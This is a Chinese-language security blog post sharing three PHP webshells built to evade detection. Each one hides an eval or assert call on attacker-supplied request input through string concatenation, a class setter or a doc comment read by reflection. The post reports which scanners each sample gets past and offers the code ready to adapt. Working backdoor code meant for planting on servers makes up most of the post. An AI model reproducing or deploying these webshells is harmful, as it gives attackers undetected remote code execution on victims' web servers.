php webshell免杀马

admin 2022年5月10日22:17:53评论165 views字数 845阅读2分49秒阅读模式



前言:最近有在系统的总计waf绕过内容和后缀的绕过。

在这个过程中发觉其实webshell的bypass手法还是蛮多的

后缀bypass总结完了 经过实战也绕过了一些waf

内容的还没写完 东西有点多

php webshell免杀马

这里就分享一些php免杀的马 直接改即可 全过的也有贼多 但是暂时就不分享了 后面应该会分享一些asp和jsp的


版本限制

使用条件:版本<7.1可用

这里发的是除了百度以外全过的(当然有全过的 但是暂时不会发出来)

马内容:

<?php

class get{
public $x="";
public $y="";
public function setName($name=1){
return $this -> name = $name;
}
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>

bypass情况:

最新版D盾

php webshell免杀马

长亭

php webshell免杀马


百度没过

php webshell免杀马

在线的 这个不建议使用 效果就离谱 其他都能查出的他不行

php webshell免杀马

河马

php webshell免杀马



版本未限制的


马1(这个只过了d盾 不太理解这个d盾为啥不查)

内容:

<?php  
/**
* assert($_GET[1+0]);
*/
class User { }
$user = new ReflectionClass('User');
$comment = $user->getDocComment();
$d = substr($comment , 14 , 20);
eval($d);
?>

php webshell免杀马

d盾

php webshell免杀马

长亭

php webshell免杀马

百度

php webshell免杀马


河马也不过

php webshell免杀马


马2

马内容:

<?php
class get{
public $x="";
public $y="";

public function setName($name=1){
return $this -> name = $name;
}
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);

bypass情况:

除百度其他的都过了

php webshell免杀马

d盾

php webshell免杀马

长亭的

php webshell免杀马

百度

php webshell免杀马

河马

php webshell免杀马



原文始发于微信公众号(goddemon的小屋):php webshell免杀马

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月10日22:17:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   php webshell免杀马http://cn-sec.com/archives/995938.html

发表评论

匿名网友 填写信息